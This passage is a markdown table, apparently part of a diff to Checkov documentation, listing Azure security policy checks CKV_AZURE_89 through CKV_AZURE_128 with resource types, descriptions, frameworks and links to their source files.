+| 1862 | CKV_AZURE_89             | resource                         | azurerm_redis_cache                                                                              | Ensure that Azure Cache for Redis disables public network access                                                                                                                                         | Terraform               | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCachePublicNetworkAccessEnabled.py)                                                     |
+| 1863 | CKV_AZURE_91             | resource                         | azurerm_redis_cache                                                                              | Ensure that only SSL are enabled for Cache for Redis                                                                                                                                                     | Terraform               | [RedisCacheEnableNonSSLPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheEnableNonSSLPort.py)                                                                         |
+| 1864 | CKV_AZURE_92             | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure that Virtual Machines use managed disks                                                                                                                                                           | arm                     | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMStorageOsDisk.py)                                                                                                           |
+| 1865 | CKV_AZURE_92             | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure that Virtual Machines use managed disks                                                                                                                                                           | Bicep                   | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMStorageOsDisk.py)                                                                                                           |
+| 1866 | CKV_AZURE_92             | resource                         | azurerm_linux_virtual_machine                                                                    | Ensure that Virtual Machines use managed disks                                                                                                                                                           | Terraform               | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py)                                                                                               |
+| 1867 | CKV_AZURE_92             | resource                         | azurerm_windows_virtual_machine                                                                  | Ensure that Virtual Machines use managed disks                                                                                                                                                           | Terraform               | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py)                                                                                               |
+| 1868 | CKV_AZURE_93             | resource                         | Microsoft.Compute/disks                                                                          | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption                                                                                             | arm                     | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py)                                                                               |
+| 1869 | CKV_AZURE_93             | resource                         | Microsoft.Compute/disks                                                                          | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption                                                                                             | Bicep                   | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py)                                                                               |
+| 1870 | CKV_AZURE_93             | resource                         | azurerm_managed_disk                                                                             | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption                                                                                             | Terraform               | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryptionSet.py)                                                                   |
+| 1871 | CKV_AZURE_94             | resource                         | Microsoft.DBforMySQL/flexibleServers                                                             | Ensure that My SQL server enables geo-redundant backups                                                                                                                                                  | arm                     | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py)                                                                                               |
+| 1872 | CKV_AZURE_94             | resource                         | Microsoft.DBforMySQL/flexibleServers                                                             | Ensure that My SQL server enables geo-redundant backups                                                                                                                                                  | Bicep                   | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py)                                                                                               |
+| 1873 | CKV_AZURE_94             | resource                         | azurerm_mysql_flexible_server                                                                    | Ensure that My SQL server enables geo-redundant backups                                                                                                                                                  | Terraform               | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py)                                                                                   |
+| 1874 | CKV_AZURE_94             | resource                         | azurerm_mysql_server                                                                             | Ensure that My SQL server enables geo-redundant backups                                                                                                                                                  | Terraform               | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py)                                                                                   |
+| 1875 | CKV_AZURE_95             | resource                         | Microsoft.Compute/virtualMachineScaleSets                                                        | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets                                                                                                                        | arm                     | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py)                                                               |
+| 1876 | CKV_AZURE_95             | resource                         | Microsoft.Compute/virtualMachineScaleSets                                                        | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets                                                                                                                        | Bicep                   | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py)                                                               |
+| 1877 | CKV_AZURE_95             | resource                         | azurerm_virtual_machine_scale_set                                                                | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets                                                                                                                        | Terraform               | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMScaleSetsAutoOSImagePatchingEnabled.py)                                                   |
+| 1878 | CKV_AZURE_96             | resource                         | Microsoft.DBforMySQL/flexibleServers                                                             | Ensure that MySQL server enables infrastructure encryption                                                                                                                                               | arm                     | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py)                                                                                             |
+| 1879 | CKV_AZURE_96             | resource                         | Microsoft.DBforMySQL/flexibleServers                                                             | Ensure that MySQL server enables infrastructure encryption                                                                                                                                               | Bicep                   | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py)                                                                                             |
+| 1880 | CKV_AZURE_96             | resource                         | azurerm_mysql_server                                                                             | Ensure that MySQL server enables infrastructure encryption                                                                                                                                               | Terraform               | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLEncryptionEnabled.py)                                                                                 |
+| 1881 | CKV_AZURE_97             | resource                         | Microsoft.Compute/virtualMachineScaleSets                                                        | Ensure that Virtual machine scale sets have encryption at host enabled                                                                                                                                   | arm                     | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py)                                                                                       |
+| 1882 | CKV_AZURE_97             | resource                         | Microsoft.Compute/virtualMachineScaleSets                                                        | Ensure that Virtual machine scale sets have encryption at host enabled                                                                                                                                   | Bicep                   | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py)                                                                                       |
+| 1883 | CKV_AZURE_97             | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure that Virtual machine scale sets have encryption at host enabled                                                                                                                                   | arm                     | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py)                                                                                       |
+| 1884 | CKV_AZURE_97             | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure that Virtual machine scale sets have encryption at host enabled                                                                                                                                   | Bicep                   | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py)                                                                                       |
+| 1885 | CKV_AZURE_97             | resource                         | azurerm_linux_virtual_machine_scale_set                                                          | Ensure that Virtual machine scale sets have encryption at host enabled                                                                                                                                   | Terraform               | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py)                                                                           |
+| 1886 | CKV_AZURE_97             | resource                         | azurerm_windows_virtual_machine_scale_set                                                        | Ensure that Virtual machine scale sets have encryption at host enabled                                                                                                                                   | Terraform               | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py)                                                                           |
+| 1887 | CKV_AZURE_98             | resource                         | azurerm_container_group                                                                          | Ensure that Azure Container group is deployed into virtual network                                                                                                                                       | Terraform               | [AzureContainerGroupDeployedIntoVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerGroupDeployedIntoVirtualNetwork.py)                                   |
+| 1888 | CKV_AZURE_99             | resource                         | Microsoft.DocumentDB/databaseAccounts                                                            | Ensure Cosmos DB accounts have restricted access                                                                                                                                                         | arm                     | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBAccountsRestrictedAccess.py)                                                                         |
+| 1889 | CKV_AZURE_99             | resource                         | Microsoft.DocumentDB/databaseAccounts                                                            | Ensure Cosmos DB accounts have restricted access                                                                                                                                                         | Bicep                   | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBAccountsRestrictedAccess.py)                                                                         |
+| 1890 | CKV_AZURE_99             | resource                         | azurerm_cosmosdb_account                                                                         | Ensure Cosmos DB accounts have restricted access                                                                                                                                                         | Terraform               | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBAccountsRestrictedAccess.py)                                                             |
+| 1891 | CKV_AZURE_100            | resource                         | Microsoft.DocumentDb/databaseAccounts                                                            | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest                                                                                                                        | arm                     | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py)                                                                                                           |
+| 1892 | CKV_AZURE_100            | resource                         | Microsoft.DocumentDb/databaseAccounts                                                            | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest                                                                                                                        | Bicep                   | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py)                                                                                                           |
+| 1893 | CKV_AZURE_100            | resource                         | azurerm_cosmosdb_account                                                                         | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest                                                                                                                        | Terraform               | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBHaveCMK.py)                                                                                               |
+| 1894 | CKV_AZURE_101            | resource                         | Microsoft.DocumentDB/databaseAccounts                                                            | Ensure that Azure Cosmos DB disables public network access                                                                                                                                               | arm                     | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py)                                                                               |
+| 1895 | CKV_AZURE_101            | resource                         | Microsoft.DocumentDB/databaseAccounts                                                            | Ensure that Azure Cosmos DB disables public network access                                                                                                                                               | Bicep                   | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py)                                                                               |
+| 1896 | CKV_AZURE_101            | resource                         | azurerm_cosmosdb_account                                                                         | Ensure that Azure Cosmos DB disables public network access                                                                                                                                               | Terraform               | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisablesPublicNetwork.py)                                                                   |
+| 1897 | CKV_AZURE_102            | resource                         | Microsoft.DBforPostgreSQL/servers                                                                | Ensure that PostgreSQL server enables geo-redundant backups                                                                                                                                              | arm                     | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgressSQLGeoBackupEnabled.py)                                                                                 |
+| 1898 | CKV_AZURE_102            | resource                         | Microsoft.DBforPostgreSQL/servers                                                                | Ensure that PostgreSQL server enables geo-redundant backups                                                                                                                                              | Bicep                   | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgressSQLGeoBackupEnabled.py)                                                                                 |
+| 1899 | CKV_AZURE_102            | resource                         | azurerm_postgresql_server                                                                        | Ensure that PostgreSQL server enables geo-redundant backups                                                                                                                                              | Terraform               | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgressSQLGeoBackupEnabled.py)                                                                     |
+| 1900 | CKV_AZURE_103            | resource                         | Microsoft.DataFactory/factories                                                                  | Ensure that Azure Data Factory uses Git repository for source control                                                                                                                                    | arm                     | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py)                                                                                 |
+| 1901 | CKV_AZURE_103            | resource                         | Microsoft.DataFactory/factories                                                                  | Ensure that Azure Data Factory uses Git repository for source control                                                                                                                                    | Bicep                   | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py)                                                                                 |
+| 1902 | CKV_AZURE_103            | resource                         | azurerm_data_factory                                                                             | Ensure that Azure Data Factory uses Git repository for source control                                                                                                                                    | Terraform               | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryUsesGitRepository.py)                                                                     |
+| 1903 | CKV_AZURE_104            | resource                         | Microsoft.DataFactory/factories                                                                  | Ensure that Azure Data factory public network access is disabled                                                                                                                                         | arm                     | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryNoPublicNetworkAccess.py)                                                                         |
+| 1904 | CKV_AZURE_104            | resource                         | Microsoft.DataFactory/factories                                                                  | Ensure that Azure Data factory public network access is disabled                                                                                                                                         | Bicep                   | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryNoPublicNetworkAccess.py)                                                                         |
+| 1905 | CKV_AZURE_104            | resource                         | azurerm_data_factory                                                                             | Ensure that Azure Data factory public network access is disabled                                                                                                                                         | Terraform               | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryNoPublicNetworkAccess.py)                                                             |
+| 1906 | CKV_AZURE_105            | resource                         | Microsoft.DataLakeStore/accounts                                                                 | Ensure that Data Lake Store accounts enables encryption                                                                                                                                                  | arm                     | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataLakeStoreEncryption.py)                                                                                           |
+| 1907 | CKV_AZURE_105            | resource                         | Microsoft.DataLakeStore/accounts                                                                 | Ensure that Data Lake Store accounts enables encryption                                                                                                                                                  | Bicep                   | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataLakeStoreEncryption.py)                                                                                           |
+| 1908 | CKV_AZURE_105            | resource                         | azurerm_data_lake_store                                                                          | Ensure that Data Lake Store accounts enables encryption                                                                                                                                                  | Terraform               | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataLakeStoreEncryption.py)                                                                               |
+| 1909 | CKV_AZURE_106            | resource                         | azurerm_eventgrid_domain                                                                         | Ensure that Azure Event Grid Domain public network access is disabled                                                                                                                                    | Terraform               | [EventgridDomainNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainNetworkAccess.py)                                                                     |
+| 1910 | CKV_AZURE_107            | resource                         | Microsoft.ApiManagement/service                                                                  | Ensure that API management services use virtual networks                                                                                                                                                 | arm                     | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py)                                                                                 |
+| 1911 | CKV_AZURE_107            | resource                         | Microsoft.ApiManagement/service                                                                  | Ensure that API management services use virtual networks                                                                                                                                                 | Bicep                   | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py)                                                                                 |
+| 1912 | CKV_AZURE_107            | resource                         | azurerm_api_management                                                                           | Ensure that API management services use virtual networks                                                                                                                                                 | Terraform               | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIServicesUseVirtualNetwork.py)                                                                     |
+| 1913 | CKV_AZURE_108            | resource                         | azurerm_iothub                                                                                   | Ensure that Azure IoT Hub disables public network access                                                                                                                                                 | Terraform               | [IoTNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/IoTNoPublicNetworkAccess.py)                                                                             |
+| 1914 | CKV_AZURE_109            | resource                         | Microsoft.KeyVault/vaults                                                                        | Ensure that key vault allows firewall rules settings                                                                                                                                                     | arm                     | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py)                                                                 |
+| 1915 | CKV_AZURE_109            | resource                         | Microsoft.KeyVault/vaults                                                                        | Ensure that key vault allows firewall rules settings                                                                                                                                                     | Bicep                   | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py)                                                                 |
+| 1916 | CKV_AZURE_109            | resource                         | azurerm_key_vault                                                                                | Ensure that key vault allows firewall rules settings                                                                                                                                                     | Terraform               | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesFirewallRulesSettings.py)                                                     |
+| 1917 | CKV_AZURE_110            | resource                         | Microsoft.KeyVault/vaults                                                                        | Ensure that key vault enables purge protection                                                                                                                                                           | arm                     | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesPurgeProtection.py)                                                                             |
+| 1918 | CKV_AZURE_110            | resource                         | Microsoft.KeyVault/vaults                                                                        | Ensure that key vault enables purge protection                                                                                                                                                           | Bicep                   | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesPurgeProtection.py)                                                                             |
+| 1919 | CKV_AZURE_110            | resource                         | azurerm_key_vault                                                                                | Ensure that key vault enables purge protection                                                                                                                                                           | Terraform               | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesPurgeProtection.py)                                                                 |
+| 1920 | CKV_AZURE_111            | resource                         | Microsoft.KeyVault/vaults                                                                        | Ensure that key vault enables soft delete                                                                                                                                                                | arm                     | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py)                                                                                       |
+| 1921 | CKV_AZURE_111            | resource                         | Microsoft.KeyVault/vaults                                                                        | Ensure that key vault enables soft delete                                                                                                                                                                | Bicep                   | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py)                                                                                       |
+| 1922 | CKV_AZURE_111            | resource                         | azurerm_key_vault                                                                                | Ensure that key vault enables soft delete                                                                                                                                                                | Terraform               | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesSoftDelete.py)                                                                           |
+| 1923 | CKV_AZURE_112            | resource                         | Microsoft.KeyVault/vaults/keys                                                                   | Ensure that key vault key is backed by HSM                                                                                                                                                               | arm                     | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py)                                                                                                             |
+| 1924 | CKV_AZURE_112            | resource                         | Microsoft.KeyVault/vaults/keys                                                                   | Ensure that key vault key is backed by HSM                                                                                                                                                               | Bicep                   | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py)                                                                                                             |
+| 1925 | CKV_AZURE_112            | resource                         | azurerm_key_vault_key                                                                            | Ensure that key vault key is backed by HSM                                                                                                                                                               | Terraform               | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyBackedByHSM.py)                                                                                                 |
+| 1926 | CKV_AZURE_113            | resource                         | Microsoft.Sql/servers                                                                            | Ensure that SQL server disables public network access                                                                                                                                                    | arm                     | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py)                                                                         |
+| 1927 | CKV_AZURE_113            | resource                         | Microsoft.Sql/servers                                                                            | Ensure that SQL server disables public network access                                                                                                                                                    | Bicep                   | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py)                                                                         |
+| 1928 | CKV_AZURE_113            | resource                         | azurerm_mssql_server                                                                             | Ensure that SQL server disables public network access                                                                                                                                                    | Terraform               | [SQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerPublicAccessDisabled.py)                                                                   |
+| 1929 | CKV_AZURE_114            | resource                         | Microsoft.KeyVault/vaults/secrets                                                                | Ensure that key vault secrets have "content_type" set                                                                                                                                                    | arm                     | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py)                                                                                                       |
+| 1930 | CKV_AZURE_114            | resource                         | Microsoft.KeyVault/vaults/secrets                                                                | Ensure that key vault secrets have "content_type" set                                                                                                                                                    | Bicep                   | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py)                                                                                                       |
+| 1931 | CKV_AZURE_114            | resource                         | azurerm_key_vault_secret                                                                         | Ensure that key vault secrets have "content_type" set                                                                                                                                                    | Terraform               | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretContentType.py)                                                                                           |
+| 1932 | CKV_AZURE_115            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure that AKS enables private clusters                                                                                                                                                                 | Terraform               | [AKSEnablesPrivateClusters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEnablesPrivateClusters.py)                                                                           |
+| 1933 | CKV_AZURE_116            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure that AKS uses Azure Policies Add-on                                                                                                                                                               | Terraform               | [AKSUsesAzurePoliciesAddon.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesAzurePoliciesAddon.py)                                                                           |
+| 1934 | CKV_AZURE_117            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure that AKS uses disk encryption set                                                                                                                                                                 | Terraform               | [AKSUsesDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesDiskEncryptionSet.py)                                                                             |
+| 1935 | CKV_AZURE_118            | resource                         | azurerm_network_interface                                                                        | Ensure that Network Interfaces disable IP forwarding                                                                                                                                                     | Terraform               | [NetworkInterfaceEnableIPForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkInterfaceEnableIPForwarding.py)                                                         |
+| 1936 | CKV_AZURE_119            | resource                         | azurerm_network_interface                                                                        | Ensure that Network Interfaces don't use public IPs                                                                                                                                                      | Terraform               | [AzureNetworkInterfacePublicIPAddressId.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureNetworkInterfacePublicIPAddressId.yaml)                                         |
+| 1937 | CKV_AZURE_120            | resource                         | azurerm_application_gateway                                                                      | Ensure that Application Gateway enables WAF                                                                                                                                                              | Terraform               | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml)                                                             |
+| 1938 | CKV_AZURE_120            | resource                         | azurerm_web_application_firewall_policy                                                          | Ensure that Application Gateway enables WAF                                                                                                                                                              | Terraform               | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml)                                                             |
+| 1939 | CKV_AZURE_121            | resource                         | Microsoft.Network/frontDoors                                                                     | Ensure that Azure Front Door enables WAF                                                                                                                                                                 | arm                     | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py)                                                                                         |
+| 1940 | CKV_AZURE_121            | resource                         | Microsoft.Network/frontDoors                                                                     | Ensure that Azure Front Door enables WAF                                                                                                                                                                 | Bicep                   | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py)                                                                                         |
+| 1941 | CKV_AZURE_121            | resource                         | azurerm_frontdoor                                                                                | Ensure that Azure Front Door enables WAF                                                                                                                                                                 | Terraform               | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFrontDoorEnablesWAF.py)                                                                             |
+| 1942 | CKV_AZURE_122            | resource                         | azurerm_web_application_firewall_policy                                                          | Ensure that Application Gateway uses WAF in "Detection" or "Prevention" modes                                                                                                                            | Terraform               | [AppGWUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUseWAFMode.py)                                                                                               |
+| 1943 | CKV_AZURE_123            | resource                         | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies                                        | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes                                                                                                                               | arm                     | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py)                                                                                                   |
+| 1944 | CKV_AZURE_123            | resource                         | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies                                        | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes                                                                                                                               | Bicep                   | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py)                                                                                                   |
+| 1945 | CKV_AZURE_123            | resource                         | azurerm_frontdoor_firewall_policy                                                                | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes                                                                                                                               | Terraform               | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontdoorUseWAFMode.py)                                                                                       |
+| 1946 | CKV_AZURE_124            | resource                         | azurerm_search_service                                                                           | Ensure that Azure Cognitive Search disables public network access                                                                                                                                        | Terraform               | [AzureSearchPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchPublicNetworkAccessDisabled.py)                                                 |
+| 1947 | CKV_AZURE_125            | resource                         | Microsoft.ServiceFabric/clusters                                                                 | Ensures that Service Fabric use three levels of protection available                                                                                                                                     | arm                     | [AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureServiceFabricClusterProtectionLevel.py)                                                         |
+| 1948 | CKV_AZURE_125            | resource                         | Microsoft.ServiceFabric/clusters                                                                 | Ensures that Service Fabric use three levels of protection available                                                                                                                                     | Bicep                   | [AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureServiceFabricClusterProtectionLevel.py)                                                         |
+| 1949 | CKV_AZURE_125            | resource                         | azurerm_service_fabric_cluster                                                                   | Ensures that Service Fabric use three levels of protection available                                                                                                                                     | Terraform               | [AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServiceFabricClusterProtectionLevel.py)                                             |
+| 1950 | CKV_AZURE_126            | resource                         | azurerm_service_fabric_cluster                                                                   | Ensures that Active Directory is used for authentication for Service Fabric                                                                                                                              | Terraform               | [ActiveDirectoryUsedAuthenticationServiceFabric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ActiveDirectoryUsedAuthenticationServiceFabric.py)                                 |
+| 1951 | CKV_AZURE_127            | resource                         | azurerm_mysql_server                                                                             | Ensure that My SQL server enables Threat detection policy                                                                                                                                                | Terraform               | [MySQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLTreatDetectionEnabled.py)                                                                         |
+| 1952 | CKV_AZURE_128            | resource                         | azurerm_postgresql_server                                                                        | Ensure that PostgreSQL server enables Threat detection policy                                                                                                                                            | Terraform               | [PostgresSQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgresSQLTreatDetectionEnabled.py)                                                             |
